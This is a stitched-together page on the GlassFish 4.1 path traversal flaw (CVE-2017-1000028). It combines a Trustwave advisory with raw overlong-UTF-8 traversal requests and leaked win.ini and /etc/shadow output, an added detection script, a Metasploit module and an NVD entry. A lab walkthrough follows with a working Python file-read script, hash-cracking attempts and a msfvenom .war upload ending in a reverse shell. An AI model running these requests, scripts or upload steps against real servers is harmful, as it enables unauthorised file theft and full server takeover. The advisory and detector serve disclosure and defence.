Glassfish server open source edition 4.1 exploit

Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition

Published: 08/27/2015
Version: 1.0

Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected: 4.1 and prior versions

Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.

The Administration Console of Oracle GlassFish Server, which listens by default on port 4848/TCP, is prone to a directory traversal vulnerability. Authenticated remote attackers can exploit it to read sensitive files on the server.

Finding 1: Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs

#Proof of Concept on Microsoft Windows installation

The authenticated directory traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request that uses a simple bypass: %C0%2F in place of the URL encoding of the slash (/).
Example:

REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
Cookie: JSESSIONID=5c47a3575077b014449e17877a0c
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d:4848/
Host: a.b.c.d:4848

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8)
Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT
Transfer-Encoding: chunked

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files.
#Proof of Concept on Linux installation

Example:

REQUEST
=======
GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/
GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
Connection: close

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7)
Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT
Date: Tue, 10 Jan 2015 10:00:00 GMT
Connection: close
Content-Length: 1087

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
TRUNCATED
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::

Vendor Response:
"We plan to fix this issue in the next major GlassFish Server Open Source Edition release."

Remediation Steps:
No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with technologies such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x, the current commercial release of GlassFish, is not affected.
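The WAF/IPS mitigation the advisory recommends comes down to canonicalising the request-target the way a lenient server would before deciding whether it escapes the web root. The Python 3 script below is an added example, not code from Trustwave or from the GlassFish project: it percent-decodes a request line, decodes overlong two-byte UTF-8 sequences (the %c0%af and %c0%ae forms in the requests above, which strict decoders reject), walks the path segments to see whether the ".." steps leave the root, and shows the hardened resolution check a file-serving handler should apply. The request lines it scans are constructed here, modelled on the advisory's, and the web root /srv/glassfish/theme is an assumed placeholder. It goes a little beyond the advisory in also flagging double percent-encoding.

```python
"""Added example: overlong-UTF-8-aware path traversal detection and safe resolution."""
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Request line: optional method, a request-target, optional HTTP version.
REQUEST_LINE = re.compile(rb"^(?:[A-Z]+\s+)?(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")


def decode_lenient_utf8(data: bytes):
    """Decode bytes the way a lenient parser would: accept the overlong two-byte
    forms (lead byte 0xC0/0xC1) that strict UTF-8 forbids. Returns (text, saw_overlong).
    bytes.decode('utf-8') raises on such input, which is the safe server behaviour;
    this exists so a detector can see what a lenient server would have seen."""
    out, overlong, i = [], False, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # e.g. C0 AF -> '/', C0 AE -> '.': a 7-bit code point padded to two bytes
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            overlong = True
            i += 2
        else:
            n = 2 if b >> 5 == 0b110 else 3 if b >> 4 == 0b1110 else 4 if b >> 3 == 0b11110 else 1
            try:
                out.append(data[i:i + n].decode("utf-8"))
            except UnicodeDecodeError:
                out.append("\ufffd")
            i += n
    return "".join(out), overlong


def analyse_request_line(line: bytes) -> dict:
    """Canonicalise the request-target and report traversal indicators."""
    m = REQUEST_LINE.match(line.strip())
    target = m.group("target") if m else line.strip()
    raw_path = target.split(b"?", 1)[0]
    once = unquote_to_bytes(raw_path)
    twice = unquote_to_bytes(once)       # differs from `once` only if double-encoded
    text, overlong = decode_lenient_utf8(once)
    text = text.replace("\\", "/")       # backslash is a separator on Windows hosts too
    depth, escapes_root = 0, False
    for seg in text.split("/"):
        if seg == "..":
            depth -= 1
            escapes_root |= depth < 0
        elif seg not in ("", "."):
            depth += 1
    findings = []
    if overlong:
        findings.append("overlong-utf8")
    if twice != once:
        findings.append("double-encoding")
    if escapes_root:
        findings.append("escapes-root")
    return {
        "decoded": text,
        "effective": posixpath.normpath("/" + text.lstrip("/")),  # what the server would open
        "findings": findings,
        "suspicious": bool(findings),
    }


def resolve_within_root(root: str, decoded_path: str):
    """Hardened lookup: join under the web root and refuse anything that leaves it.
    posixpath keeps this deterministic; a real server should use os.path.realpath
    on the result so symlinks cannot point outside the root either."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded_path.lstrip("/")))
    return candidate if candidate == root or candidate.startswith(root + "/") else None


# Constructed sample request lines modelled on the advisory's, plus a benign one.
SAMPLE_REQUEST_LINES = [
    b"GET /theme/META-INF/prototype" + b"%c0%af.." * 12 + b"%c0%afwindows/win.ini HTTP/1.1",
    b"GET /theme/META-INF/" + b"%c0%ae%c0%ae%c0%af" * 10 + b"etc%c0%afshadow/ HTTP/1.1",
    b"GET /theme/com/sun/webui/jsf/suntheme/css/css_master.css HTTP/1.1",
]


def scan(lines):
    return [analyse_request_line(line) for line in lines]


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUEST_LINES):
        print("ALERT" if r["suspicious"] else "ok   ", r["effective"], r["findings"])
```

The two advisory-style lines come back as ALERT with both "overlong-utf8" and "escapes-root", with the effective targets /windows/win.ini and /etc/shadow; the stylesheet request is clean. The "overlong-utf8" finding on its own is already a strong signal: no legitimate client sends %c0%af for a slash.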
Revision History:
01/12/2015 - Vulnerability disclosed to vendor
02/18/2015 - Notified vendor about the updates to TW security policy
05/19/2015 - Ninety-day deadline exceeded
07/14/2015 - Requested status from vendor
07/31/2015 - Requested status from vendor
08/21/2015 - Notified vendor about public disclosure
08/27/2015 - Advisory published

References
1. https://www.owasp.org/index.php/Path_Traversal
2. https://glassfish.java.net/
3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
      'Description'    => %q{
        This module exploits an unauthenticated directory traversal vulnerability which exists
        in the administration console of Oracle GlassFish Server 4.1, which is listening by
        default on port 4848/TCP.
      },
      'References'     =>
        [
          ['CVE', '2017-1000028'],
          ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
          ['EDB', '39441']
        ],
      'Author'         =>
        [
          'Trustwave SpiderLabs', # Vulnerability discovery
          'Dhiraj Mishra'         # Metasploit module
        ],
      'DisclosureDate' => 'Aug 08 2015',
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(4848),
        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
        OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 13])
      ])
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    # Build the traversal prefix: DEPTH copies of an overlong-encoded "/.." followed by the target file
    traversal = "%c0%af.." * datastore['DEPTH'] << filename

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/theme/META-INF/prototype#{traversal}"
    })

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    vprint_good("#{peer} - #{res.body}")
    path = store_loot(
      'oracle.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end


CVE-2017-1000028

Detail

Current Description

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both an authenticated and an unauthenticated Directory Traversal vulnerability that can be exploited by issuing a specially crafted HTTP GET request.


Severity

CVSS 3.x Severity and Metrics (NIST / NVD):
  Base Score: 7.5 HIGH
  Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 Severity and Metrics (National Institute of Standards and Technology / NVD):
  Base Score: 5.0 MEDIUM
  Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-ID   CWE Name                                                                        Source
CWE-22   Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')   NIST

Known Affected Software Configurations

cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* (vulnerable)

Change History

4 change records found

Modified Analysis by NIST, 5/03/2019 2:27:52 PM
  Changed Reference Type
    https://www.exploit-db.com/exploits/45196/
    Old: No Types Assigned
    New: Exploit, Third Party Advisory, VDB Entry
  Changed Reference Type
    https://www.exploit-db.com/exploits/45198/
    Old: No Types Assigned
    New: Exploit, Third Party Advisory, VDB Entry
  Changed Reference Type
    https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    Old: Mailing List, Third Party Advisory
    New: Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE, 8/17/2018 6:29:01 AM
  Added Reference
    https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE, 8/16/2018 6:29:00 AM
  Added Reference
    https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST, 7/21/2017 11:50:13 AM
  Added CPE Configuration
    OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  Added CVSS V2
    (AV:N/AC:L/Au:N/C:P/I:N/A:N)
  Added CVSS V3
    AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Added CWE
    CWE-22
  Changed Reference Type
    https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    Old: No Types Assigned
    New: Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry: CVE-2017-1000028
NVD Published Date: 07/17/2017
NVD Last Modified: 05/03/2019
Source: MITRE

Better late than never, I guess.  I wanted to write this up a while back but I got distracted and by the time I returned to my notes, I felt like I’d lost the flow.  I had the screenshots but when I looked at it, I could remember that I wanted to discuss a few points but I couldn’t remember exactly what.  Rather than just upload the images with some text, I decided to go back through it once more.  But then I had an issue with the server where it was living and I ended up rebuilding the image.  So it’s been awhile.  Moving on…

According to Wiki:  “GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server.”

When I began poking around, the avenues of attack for GlassFish felt similar to Tomcat.  When I searched for the difference, I came up with:  “Tomcat is simply an HTTP server and a Java servlet container. Glassfish is a complete Java EE application server.”  So not exactly the same but perhaps they were built with a similar style.

In our enumeration process, we uncover the GlassFish login page:

When we check searchsploit, we find:

When I view the contents of the file for the GlassFish 4.1 Directory Traversal, I see a basic Local File Inclusion vulnerability which I decide to go after with Python:

#!/usr/bin/python

import urllib2
import os
import ssl

# Disable TLS certificate verification (Python 2.7.9+ verifies by default),
# since the admin console is reached over https on 4848.
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
        getattr(ssl, '_create_unverified_context', None)):
    ssl._create_default_https_context = ssl._create_unverified_context

print "[*] Target URL format = https://www.mydomain.com:4848"
host = raw_input("[*] Enter target URL: ")

while True:
    print "[*] Target file format = windows/win.ini"
    file = raw_input("[*] Enter target file: ")
    # Traversal prefix from the advisory: overlong-encoded slashes (%c0%af) between the ".." segments
    path = '/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af'
    combined = host + path + file
    url = urllib2.urlopen(combined)
    print
    print "fetching... " + combined
    html = url.readlines()
    print
    print html
    print

I’ve highlighted the vulnerable URL and you can literally paste this into a browser to get the same result.  

I prefer to write this into a loop that allows me to hit a few different files should I choose to do so.

When we execute our script, I go after the win.ini file and when that works, I go after the GlassFish hash:

I spend entirely too much time trying to crack this hash — unsuccessfully.  A few points on the hash.  First, there wasn’t an obvious hash type.  Several are close.  There were also some reversing angles using base64 -d, xxd, and sed but that also went nowhere.  In each case, I ended up with a string and a possible hash type to crack with Hashcat but none were successful.  Eventually, I moved on because I don’t know enough about this particular hash and the Internet didn’t provide any concrete assistance.  

There’s also another hash stored in:

C:\glassfish\glassfish4\glassfish\domains\domain1\config\local-password

But once again, I couldn’t get the hash type and I was unable to crack it.

For the purpose of my education, I reset the password to one that I could brute force and then I went after it with Metasploit:

Once set up, I run:

Not long after, I retrieve the credentials and I’m heading for the admin interface:

Once we get into the admin interface, we see something that looks similar to Tomcat:

We browse to the Deploy page:

Assuming we’re dealing with the same format, we generate a .war file with msfvenom:

We get our handler setup:

We then browse to our payload:

When we choose “OK”, we see our uploaded payload:

We select Launch and we are brought to a secondary page which is a slight deviation from Tomcat but we’ll roll with it:

Noting that it’s using the server name instead of IP address, I quickly add an entry into the hosts file in order to keep this from failing.  Once I get the entry set, I click on the first link:

Moving back over to Metasploit:

We see the inbound connection from the GlassFish server.  

We could also perform this task with Metasploit:

A couple of things to point out.  First, it’s very particular about the payload and the target.  Second, even though we get the correct payload and target, it takes a couple of tries to get a shell.  That’s not necessarily unique for Metasploit but when we’re dealing with an unknown application, it’s possible to think it doesn’t work but it’s also maybe the time to hit run a few more times for good measure.

After two failed attempts, I run a third time:

And we catch our shell.

Metasploit also had a module for the Directory Traversal, but I like the Python script with its loop, where I can just enter a file name without having to do the extra steps.

Aside from that, GlassFish is fairly standard.  I haven’t encountered it previously and for the sake of trying to remember as much as possible, I like to go through it, write about it, and have a record for later review.  The password hash, for example, is something I might forget and I could end up burning more time to draw the same conclusion.

Written by Jane